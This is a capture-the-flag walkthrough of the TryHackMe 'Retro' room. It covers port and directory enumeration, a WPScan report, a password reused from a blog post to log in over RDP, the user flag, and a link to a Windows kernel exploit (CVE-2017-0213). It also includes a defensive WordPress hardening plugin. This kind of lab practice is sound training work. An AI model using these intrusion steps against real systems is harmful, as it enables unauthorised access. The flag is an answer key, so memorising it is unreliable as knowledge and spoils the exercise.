https://tryhackme.com/room/retro

Pwned Date - 29th July 2022

Enumeration

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2022-07-29T04:20:56+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2022-07-28T04:19:17
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153 -w /usr/share/wordlists/dirb/common.txt -q -t 200 
                                                                                          
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153 -w /usr/share/wordlists/dirb/big.txt -q -t 200    
/retro                (Status: 301) [Size: 150] [--> <http://10.10.234.153/retro/>]

The common.txt wordlist found nothing; big.txt led us to /retro


┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153/retro -w /usr/share/wordlists/dirb/big.txt -q -t 200 
/wp-content           (Status: 301) [Size: 161] [--> <http://10.10.234.153/retro/wp-content/>]
/wp-admin             (Status: 301) [Size: 159] [--> <http://10.10.234.153/retro/wp-admin/>]  
/wp-includes          (Status: 301) [Size: 162] [--> <http://10.10.234.153/retro/wp-includes/>]

Another fuzzing round under /retro shows the wp-* directories, so this is a WordPress site and we run wpscan against it

┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://10.10.234.153/retro/>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - <https://automattic.com/>
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: <http://10.10.234.153/retro/> [10.10.234.153]
[+] Started: Fri Jul 29 00:26:04 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: <http://10.10.234.153/retro/xmlrpc.php>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - <http://codex.wordpress.org/XML-RPC_Pingback_API>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>

[+] WordPress readme found: <http://10.10.234.153/retro/readme.html>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: <http://10.10.234.153/retro/wp-cron.php>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - <https://www.iplocation.net/defend-wordpress-from-ddos>
 |  - <https://github.com/wpscanteam/wpscan/issues/1299>

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - <http://10.10.234.153/retro/index.php/feed/>, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - <http://10.10.234.153/retro/index.php/comments/feed/>, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
 | Location: <http://10.10.234.153/retro/wp-content/themes/90s-retro/>
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: <http://10.10.234.153/retro/wp-content/themes/90s-retro/readme.txt>
 | Style URL: <http://10.10.234.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1>
 | Style Name: 90s Retro
 | Style URI: <https://organicthemes.com/retro-theme/>
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: <https://organicthemes.com>
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - <http://10.10.234.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1>, Match: 'Version: 1.4.10'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - <http://10.10.234.153/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:23 <======================================================================================================> (137 / 137) 100.00% Time: 00:00:23

[i] No Config Backups Found.

After many trials we ended up reading the posts and found this


Password, maybe? parzival
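Everything wpscan reported above (XML-RPC reachable, the version leaking through the feed generator tag, the user list via wp-json, the author-ID pattern and the verbose login errors) is a WordPress default that the site owner can switch off. The following must-use plugin is an added example written for this writeup, not code from the room or from WordPress itself; the REST route keys and the generic login message are my assumptions about a sensible default.

```php
<?php
/**
 * Plugin Name: Retro Hardening (added example, not from the room)
 *
 * Drop into wp-content/mu-plugins/ to close the exposures wpscan reported:
 * XML-RPC, the version leak in the feed generator tag, user enumeration via
 * wp-json, ?author=N archives and verbose login errors.
 */

// 1. XML-RPC: wpscan flagged xmlrpc.php as enabled; turn the API off outright.
add_filter( 'xmlrpc_enabled', '__return_false' );

// 2. Version leak: wpscan fingerprinted 5.2.1 from <generator> in the RSS feed.
remove_action( 'wp_head', 'wp_generator' );
add_filter( 'the_generator', '__return_empty_string' );

// 3. User enumeration via /wp-json/wp/v2/users: hide the route from anonymous callers
//    (route keys assumed to match the core registration for the users controller).
add_filter( 'rest_endpoints', function ( $endpoints ) {
    if ( ! is_user_logged_in() ) {
        unset( $endpoints['/wp/v2/users'] );
        unset( $endpoints['/wp/v2/users/(?P<id>[\d]+)'] );
    }
    return $endpoints;
} );

// 4. Author pattern (?author=1 -> /author/wade/): redirect anonymous probes home.
//    Priority 1 runs before redirect_canonical, so the username never appears
//    in a Location header either.
add_action( 'template_redirect', function () {
    if ( is_author() && ! is_user_logged_in() ) {
        wp_safe_redirect( home_url( '/' ), 301 );
        exit;
    }
}, 1 );

// 5. Login error messages: one generic message whether the username exists or not.
add_filter( 'login_errors', function () {
    return 'Invalid login credentials.';
} );
```

The readme.html finding is a static file that PHP hooks cannot hide; it has to be deleted or blocked at the IIS level.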

Exploitation

Since we now have a candidate password, instead of trying it against WordPress any further we RDP straight into the box

xfreerdp /v:10.10.16.193 /u:wade

And the user.txt is on the Desktop

3b99fbdc6d430bfb51c72c651a261927

Privilege Escalation (1) - Kernel Exploit

windows-kernel-exploits/CVE-2017-0213 at master · SecWiki/windows-kernel-exploits